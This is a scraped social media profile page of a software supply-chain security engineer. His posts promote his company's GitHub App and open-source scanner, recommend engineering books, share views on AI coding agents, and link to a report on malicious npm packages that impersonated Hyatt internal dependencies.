Abhisek Datta
@abh1sek
Followers
3K
Following
5K
Media
216
Statuses
3K
Author of 🚀 https://t.co/Tgbp4Dx9V5 | Building @safedepio | Software Engineer | Possibly Security Researcher | Securing Open Source Software | Nerd?
India
Joined May 2008
The SafeDep GitHub App is officially live on the GitHub Marketplace!🎉 Install → Scan → Relax😌 Try it out here👇 https://t.co/ETDd5zfJT9
0
2
8
Books that you should read for improving your software engineering skills. Side effect is, they will prepare you for Staff+ roles - Clean Code - Clean Architecture - The Pragmatic Programmer Once you are able to use the ideas: - Designing Data Intensive Applications For
0
1
7
Looking forward to this!
So many people keep asking me about Continue. What is it? What are you up to? Here you go... Continue started as a research effort two years ago, with the belief that if the human body is a system, it should also have its leverage points. The simple levers that, when adjusted,
0
0
0
⚠️ Open Source Software Supply Chain attack targeting Hyatt internal dependencies through dependency confusion attack. Read more ➡️ https://t.co/Ss2nz5H0ZX
safedep.io
Three malicious npm packages disguised as Hyatt internal dependencies were discovered using install hooks to execute malicious payloads. All packages share identical attack patterns and infrastruct...
0
4
5
Looks like there is an onslaught of AI influencers on X. AI generated persona. Similar content. Anyone else seeing this?
0
0
1
🚀
When you have the SafeDep GitHub App installed, you can just sit back, relax, and focus on building. 👉 https://t.co/VUbAaMSIhI
0
0
2
This is true. I am seeing great benefit of Claude Code (and now Cursor) plan mode. In fact I think it makes sense to check in the plan based on which a certain feature waste implemented.
I’m begging you When having Codex/CC/whatever make a large change to your codebase Have a lengthy conversation with it first, clarifying everything you can Only then should you ask it to start building
0
0
1
Next is to figure out the workflow. How to use them to boost productivity, retaining control and not compensate the coding time advantage with code review slog.
0
0
0
AI coding agents starts getting meaningful when you treat them as a developer and not a replacement to your own thinking and imagination.
1
0
1
Arguably the most brilliant engineer in FFmpeg left because of this. He reverse engineered dozens of codecs by hand as a volunteer. Then security "researchers" and corporate employees came along repeatedly insisted "critical" security issues were fixed immediately waving their
154
709
9K
New version of vet released with multiple bug fixes and feature updates. ➡️ Policy language revamp ➡️ Multiple bug fixes ➡️ Console experience improvements Everything you need to audit, analyse and secure your open source software supply chain. https://t.co/SZavyaJRsO
github.com
Protect against malicious open source packages 🤖. Contribute to safedep/vet development by creating an account on GitHub.
0
3
7
In another news, I have stopped using GitHub Copilot in my nvim. Its a zen experience without the zen mode. Works amazingly well when I am laying down the LLD aspects of the project. Claude Code for analysis, planning and coding few stuff as per the declared conventions.
0
0
1
Fairly sure it is. Given the cost of storage and cost of engineering bandwidth for fixing security bugs.
1
0
2
In security, sometimes we overlap quantitative and qualitative solution. This is a mistake. Even with AI, it will be nearly impossible for a static code analysis tool to beat a security researcher like duke or taviso on novelty (quality). But it can beat them on quantity.
1
1
3